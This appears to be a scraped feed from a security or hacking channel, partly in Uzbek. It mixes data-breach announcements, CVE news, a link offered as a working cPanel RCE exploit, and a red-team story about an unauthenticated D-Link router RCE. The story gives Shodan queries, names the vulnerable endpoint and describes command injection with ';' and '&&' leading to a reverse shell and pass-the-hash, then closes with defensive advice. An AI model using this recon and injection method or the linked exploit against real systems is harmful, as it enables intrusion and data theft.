Congratulations guys 🔥🔥🔥

)))

Keep calm guys.

I read on one of the forums that there is more info and unfortunately you have to pay for registration, maybe the amount paid will provide the necessary information. If you have the money, I think it is worth buying. Especially for Threat Intelligence...

#TI #DataLeak #Forums

ShinyHunters Breached 420k+ DarkForums Posts/Users/IPs

#TI #DataLeak #ShinyHunters #DarkForum

🔥 GitHub RCE via single git push!

CVE-2026-3854: Unsanitized push options let attackers run commands on backend servers, bypassing sandboxing (cross-tenant risk).

🔗 Learn how header injection led to full compromise → https://thehackernews.com/2026/04/researchers-discover-critical-github.html?m=1

Butterfly Force's Free-Data: The First Chinese Data Platform on the Dark Web

#DataLeak #Forum #China

CVE-2026-41940

Real exploit RCE

http://github.com/BlackHatExploitation/Cpanel_RCE

Read “International AITU CTF on Kazakhstan SCADA system PWNED🇰🇿“ by JavaSec.uz on Medium: https://medium.com/@abduxalilovjavohir393/international-aitu-ctf-on-kazakhstan-scada-system-pwned-d9b4655a66f3

Breached chopar pizza users)))

Alleged data breach involving Zoodmall.com 🌍

~816K+ user records across multiple countries reportedly exposed

Breakdown:
• Iraq: ~371K
• Uzbekistan: ~252K
• Lebanon: ~193K

Data may include:
• Full names
• Phone numbers ⚠️
• Country, city & ZIP details
• Addresses
• Payment & transaction data
• Product details (SKU, price, quantity)

⚠️ Why this matters:
→ Targeted scams using order & transaction data
→ Identity theft & location-based risks
→ Financial fraud possibilities
→ Cross-border exposure increases impact

#DataBreach #CyberSecurity #DataLeak #Privacy #Infosec #ThreatIntel

🔴 Kichik Red Team Real Case: Bitta router qanday qilib butun tashkilotni qulatadi?

Ko‘pchilik hali ham shunaqa o‘ylaydi:
“Routerda kichik muammo bo‘lsa ham, undan katta zarar chiqmaydi…”

Lekin real holatda bu fikr juda xato.

---

🧠 Qisqa foundation:

Routerlarda uchraydigan asosiy zaifliklar:
• RCE (auth / unauth)
• Authentication bypass
• Command injection
• Default credentials
• Eski firmware

Va bularni topish qiyin ham emas.

Shodan orqali:
• Internetga ochiq routerlar
• Model va firmware
• Login panel’lar

hammasi ko‘rinib turadi.

---

😤 Real case boshlanishi:

Attacker tashkilotni test qiladi:

• Web app → himoyalangan
• Serverlar → patch qilingan
• AD → relay ishlamaydi
• Endpoint → EDR bor

👉 Bir necha kun urinishlardan keyin ham hech narsa topilmadi.

---

🔍 Burilish nuqtasi:

Attacker tashqaridan qaraydi.

Shodan orqali qidiradi:

port:80 "router"
port:8080 "login"
port:8291 "RouterOS"

👉 Va bitta narsa topadi:

Internetga ochiq turgan D-Link router

---

⚠️ Zaiflik: CVE-2026-0625

Bu oddiy bug emas.

👉 Bu — unauthenticated RCE

Ya’ni:
• Login kerak emas
• Session kerak emas
• Faqat bitta HTTP request yetarli

---

💣 Texnik tafsilot (soddalashtirilgan):

Router’da dnscfg.cgi endpoint mavjud bo‘ladi.

Bu endpoint:
• Foydalanuvchi kiritgan qiymatni tekshirmaydi
• Input sanitization yo‘q

Attacker esa:

• Maxsus crafted HTTP request yuboradi
• Parametr ichiga command qo‘shadi (`;`, && kabi)

Natija:

👉 Router shell’da attacker command’i ishlaydi

---

🔥 Exploit natijasi:

Attacker:

• Reverse shell oladi
• Router OS darajasida ishlaydi
• Root huquqlarga yaqin nazoratga ega bo‘ladi

---

🕸 Shu yerdan keyin eng xavfli bosqich boshlanadi:

Router — bu oddiy qurilma emas.

Bu:
👉 Butun tarmoqning markazi

Attacker:

• Traffic’ni kuzatadi (packet capture)
• DNS’ni o‘zgartiradi (redirect)
• ARP spoofing qiladi
• Internal IP’larni aniqlaydi

---

🔐 Eng muhim zarba:

👉 NTLM authentication’lar ushlab olinadi

Bu degani:

• Foydalanuvchi login bo‘lsa
• Hash router orqali o‘tadi
• Attacker uni yozib oladi

---

🎭 Keyin nima bo‘ladi?

• Pass-the-Hash attack
• Internal service’larga kirish
• Xodimlarga targeted phishing

👉 Attacker endi “tashqaridan kelgan xaker” emas
👉 U “ichki foydalanuvchi”ga aylanadi

---

💥 Natija:

• Lateral movement
• Serverlar compromise
• Credential chain reaction
• To‘liq takeover

---

📄 Va eng qo‘rqinchli joy:

Final report’da faqat:

👉 “Exposed D-Link router (CVE-2026-0625)”

---

😐 Haqiqat esa:

Shu bitta zaiflik:

• Perimeter’ni buzdi
• Ichki tarmoqqa yo‘l ochdi
• Barcha himoyalarni bypass qildi

---

⚠️ Routerlarda yana qanday zaifliklar chiqishi mumkin?

Bu faqat RCE emas.

Ko‘pincha quyidagilar ham bo‘ladi:

🔓 Authentication bypass
👉 Login qilmasdan admin panelga kirish

💣 Command injection
👉 Diagnostic funksiyalar orqali OS command ishlatish

🧬 CSRF (Cross-Site Request Forgery)
👉 Foydalanuvchi orqali router sozlamasini o‘zgartirish

🌐 DNS hijacking
👉 Trafikni fake saytga yo‘naltirish

🔑 Default credentials
👉 Eng oddiy, lekin eng xavfli xato

🕳 Backdoor / hidden account
👉 Ishlab chiqaruvchi yoki malware qoldirgan access

📡 Open management ports
👉 Telnet / SSH / Web internetga ochiq

---

🧩 Xulosa:

Ba’zida:

❌ Zero-day kerak emas
❌ Murakkab exploit ham shart emas

👉 Bitta exposed router yetarli

---

🔐 Tavsiyalar:

• Router’ni internetdan yopish (VPN orqali kirish)
• Firmware’ni doim yangilash
• Default credential’larni o‘zgartirish
• Monitoring va loglarni tekshirish
• Keraksiz servislarni o‘chirish

---

👉 Esda tuting:

“Router — bu kichik qurilma emas.

Bu — butun tarmoqqa kirish eshigi.”

Sigama rules based MITRE | ATT&CK 3000+ detection rules

Source: https://github.com/SigmaHQ/sigma

we are cooked